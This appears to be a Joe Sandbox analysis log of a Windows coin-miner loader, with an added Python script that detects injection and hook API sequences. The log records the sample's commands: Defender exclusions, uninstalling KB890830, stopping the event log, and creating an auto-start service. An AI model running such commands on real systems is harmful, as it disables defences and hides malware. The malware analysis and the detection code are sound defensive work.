Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,11_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,20_2_00000225DC6428C8
Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AE202C NtQuerySystemInformation,StrCmpNIW,26_2_00000202C0AE202C
Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AE253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,26_2_00000202C0AE253C
Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAEDF28C8 NtEnumerateValueKey,NtEnumerateValueKey,30_2_000002BAAEDF28C8
Source: C:\Windows\System32\dialer.exe | Code function: 39_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,39_2_00000001400010C0
Source: C:\Windows\System32\dialer.exe | Code function: 42_2_0000000140001394 NtCloseObjectAuditAlarm,42_2_0000000140001394
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | File created: C:\Windows\TEMP\gyqerfjfsbie.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_psqhir2y.fz0.ps1
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_000000014000226C
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_0000000140002560
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC611F2C
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC61D0E0
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC6238A8
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC642B2C
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC64DCE0
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC6544A8
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC671F2C
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC67D0E0
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC6838A8
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC6A2B2C
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC6ADCE0
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC6B44A8
Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AB1F2C
Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AC38A8
Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0ABD0E0
Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AE2B2C
Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AF44A8
Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AEDCE0
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002A6612D1F2C
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002A6612DD0E0
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002A6612E38A8
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002A661302B2C
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002A66131AEC5
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002A66130DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002A6613144A8
Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAEDC1F2C
Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAEDCD0E0
Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAEDD38A8
Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAEDF2B2C
Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAEDFDCE0
Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAEE044A8
Source: C:\Windows\System32\dialer.exe | Code function: 39_2_000000014000226C
Source: C:\Windows\System32\dialer.exe | Code function: 39_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe | Code function: 39_2_0000000140002560
Source: C:\Windows\System32\dialer.exe | Code function: 42_2_0000000140003240
Source: C:\Windows\System32\dialer.exe | Code function: 42_2_00000001400027D0
Source: C:\Windows\System32\svchost.exe | Code function: 45_2_0000026A8799D0E0
Source: C:\Windows\System32\svchost.exe | Code function: 45_2_0000026A879A38A8
Source: C:\Windows\System32\svchost.exe | Code function: 45_2_0000026A87991F2C
Source: C:\Windows\System32\svchost.exe | Code function: 45_2_0000026A879CDCE0
Source: C:\Windows\System32\svchost.exe | Code function: 45_2_0000026A879D44A8
Source: C:\Windows\System32\svchost.exe | Code function: 45_2_0000026A879C2B2C
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000179537838A8
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_000001795377D0E0
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_0000017953771F2C
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000179537B44A8
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000179537ADCE0
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000179537A2B2C
Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000002295D53D0E0
Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000002295D5438A8
Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000002295D531F2C
Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000002295D56DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000002295D5744A8
Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000002295D562B2C
Source: C:\Windows\System32\svchost.exe | Code function: 50_2_00000253067D1F2C
Source: C:\Windows\System32\svchost.exe | Code function: 50_2_00000253067DD0E0
Source: C:\Windows\System32\svchost.exe | Code function: 50_2_00000253067E38A8
Source: C:\Windows\System32\svchost.exe | Code function: 50_2_0000025306E62B2C
Source: C:\Windows\System32\svchost.exe | Code function: 50_2_0000025306E6DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 50_2_0000025306E744A8
Source: C:\Windows\System32\svchost.exe | Code function: 51_2_000001845B3D44A8
Source: C:\Windows\System32\svchost.exe | Code function: 51_2_000001845B3CDCE0
Source: C:\Windows\System32\svchost.exe | Code function: 51_2_000001845B3C2B2C
Source: C:\Windows\System32\svchost.exe | Code function: 53_2_000001ADECD4DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 53_2_000001ADECD544A8
Source: C:\Windows\System32\svchost.exe | Code function: 53_2_000001ADECD42B2C
Source: C:\Windows\System32\svchost.exe | Code function: 54_2_000001D5590538A8
Source: C:\Windows\System32\svchost.exe | Code function: 54_2_000001D55904D0E0
Source: C:\Windows\System32\svchost.exe | Code function: 54_2_000001D559041F2C
Source: C:\Windows\System32\svchost.exe | Code function: 54_2_000001D5590844A8
Source: C:\Windows\System32\svchost.exe | Code function: 54_2_000001D55907DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 54_2_000001D559072B2C
Source: C:\Windows\System32\svchost.exe | Code function: 55_2_00000241A9EA2B2C
Source: C:\Windows\System32\svchost.exe | Code function: 55_2_00000241A9EADCE0
Source: C:\Windows\System32\svchost.exe | Code function: 55_2_00000241A9EB44A8
Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001CD73161F2C
Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001CD731738A8
Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001CD7316D0E0
Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001CD73192B2C
Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001CD731A44A8
Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001CD7319DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 57_2_000002824E86D0E0
Source: C:\Windows\System32\svchost.exe | Code function: 57_2_000002824E8738A8
Source: C:\Windows\System32\svchost.exe | Code function: 57_2_000002824E861F2C
Source: C:\Windows\System32\svchost.exe | Code function: 57_2_000002824E89DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 57_2_000002824E8A44A8
Source: C:\Windows\System32\svchost.exe | Code function: 57_2_000002824E892B2C
Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000021B473CD0E0
Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000021B473D38A8
Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000021B473C1F2C
Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000021B47B3DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000021B47B444A8
Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000021B47B32B2C
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\gyqerfjfsbie.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: loader.exe | Static PE information: invalid certificate
Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: classification engine | Classification label: mal100.troj.spyw.evad.mine.winEXE@62/74@2/2
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
Source: C:\Windows\System32\dialer.exe | Code function: 39_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
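The Code function entries that carry an API list are the most informative lines in this report. For dialer.exe, function 11_2_00000001400010C0 shows the classic remote-thread injection order (OpenProcess, VirtualAllocEx, WriteProcessMemory, NtCreateThreadEx, WaitForSingleObject), and 11_2_000000014000226C enables a token privilege with LookupPrivilegeValueW and AdjustTokenPrivileges before writing a registry key with a custom security descriptor and starting worker threads. The NtQuerySystemInformation, NtEnumerateValueKey and NtQueryDirectoryFileEx entries, by contrast, are located inside winlogon.exe, lsass.exe and dwm.exe, consistent with the "Hooks ... query functions" signatures listed at the top of the report. What follows is an added example, not part of the Joe Sandbox report and not code from the sample: a parser for lines in this shape (it accepts both the fused form and the pipe-separated form, and drops the trailing repeated function id) plus an ordered-subsequence matcher run over constructed sample lines, five of them copied from the entries above (one abridged), one benign control and one entry without an API list. The rule names, the set of system hosts and the alternative API names accepted per step are assumptions for the example.

```python
import re

# Hosts where a code region calling an enumeration API is worth flagging on its own
# (assumption for this example; tune to the environment).
SYSTEM_HOSTS = {"winlogon.exe", "lsass.exe", "dwm.exe", "svchost.exe", "explorer.exe"}

# rule name -> (ordered steps, host filter). Each step is a tuple of acceptable API names;
# the steps must occur in this order, other calls may sit between them. None = any host.
SEQUENCE_RULES = {
    "remote_thread_injection": ((
        ("OpenProcess", "NtOpenProcess"),
        ("VirtualAllocEx", "NtAllocateVirtualMemory"),
        ("WriteProcessMemory", "NtWriteVirtualMemory"),
        ("NtCreateThreadEx", "CreateRemoteThread", "RtlCreateUserThread"),
    ), None),
    "token_privilege_adjust": ((
        ("OpenProcessToken",),
        ("LookupPrivilegeValueW", "LookupPrivilegeValueA"),
        ("AdjustTokenPrivileges",),
    ), None),
    # Enumerate, then compare names: the shape of a user-mode filter that hides entries.
    "process_list_filter": ((
        ("NtQuerySystemInformation",),
        ("StrCmpNIW", "StrCmpIW", "StrStrIW", "lstrcmpiW"),
    ), SYSTEM_HOSTS),
    "registry_enum_in_system_host": ((("NtEnumerateValueKey",),), SYSTEM_HOSTS),
    "directory_enum_in_system_host": ((("NtQueryDirectoryFileEx", "NtQueryDirectoryFile"),), SYSTEM_HOSTS),
}

LINE_RE = re.compile(
    r"Source:\s*(?P<src>\S+?)\s*\|?\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]+)(?:\s+(?P<apis>\S.*?))?\s*$"
)
FID_RE = re.compile(r"\d+_\d+_[0-9A-Fa-f]+")


def parse_line(line):
    """Return (process basename, function id, [api names]) or None when there is no API list."""
    m = LINE_RE.search(line)
    if not m or not m.group("apis"):
        return None
    proc = m.group("src").rsplit("\\", 1)[-1].lower()
    apis = [t.strip() for t in m.group("apis").split(",")]
    apis = [t for t in apis if t and not FID_RE.fullmatch(t)]  # drop the trailing repeated id
    return proc, m.group("fid"), apis


def matches_in_order(apis, steps):
    """True if one API from each step appears in apis in step order (gaps allowed)."""
    pos = 0
    for step in steps:
        while pos < len(apis) and apis[pos] not in step:
            pos += 1
        if pos == len(apis):
            return False
        pos += 1
    return True


def scan(lines):
    """Return (process, function id, rule name) for every entry that matches a rule."""
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, fid, apis = parsed
        for name, (steps, hosts) in SEQUENCE_RULES.items():
            if hosts is not None and proc not in hosts:
                continue
            if matches_in_order(apis, steps):
                hits.append((proc, fid, name))
    return hits


# Constructed sample in the shape of the report's Code function entries.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,11_2_00000001400010C0",
    r"Source: C:\Windows\System32\dialer.exe | Code function: 11_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegCreateKeyExW,RegSetValueExW,CreateThread,SleepEx",
    r"Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AE202C NtQuerySystemInformation,StrCmpNIW",
    r"Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey",
    r"Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AE253C NtQueryDirectoryFileEx,GetFileType,StrCpyW",
    # benign control: opens a process but never writes to it
    r"Source: C:\Windows\System32\notepad.exe | Code function: 7_2_00007FF6A1B21000 OpenProcess,K32GetModuleFileNameExW,CloseHandle",
    # fused entry with no API list, as in the original page layout: skipped by the parser
    r"Source: C:\Windows\System32\dialer.exeCode function: 11_2_000000014000226C11_2_000000014000226C",
]

if __name__ == "__main__":
    for proc, fid, rule in scan(SAMPLE_LINES):
        print(f"{proc:14s} {fid}  {rule}")
```

The matcher is deliberately order-sensitive: a function that merely imports VirtualAllocEx and WriteProcessMemory somewhere is common in installers, but OpenProcess followed by allocate, write and create-thread in that order is the injection primitive itself. The host filter keeps the enumeration rules quiet for ordinary processes and fires only where the report saw them, inside winlogon, lsass and dwm.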
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7380:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\dialer.exe | Mutant created: \BaseNamedObjects\Global\nrfynzqfftbrthxk
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4igs0l0.4bk.ps1
Source: loader.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Users\user\Desktop\loader.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: loader.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\loader.exe | File read: C:\Users\user\Desktop\loader.exe
Source: unknown | Process created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NUTGFFPE"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NUTGFFPE"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NUTGFFPE"
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto"
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
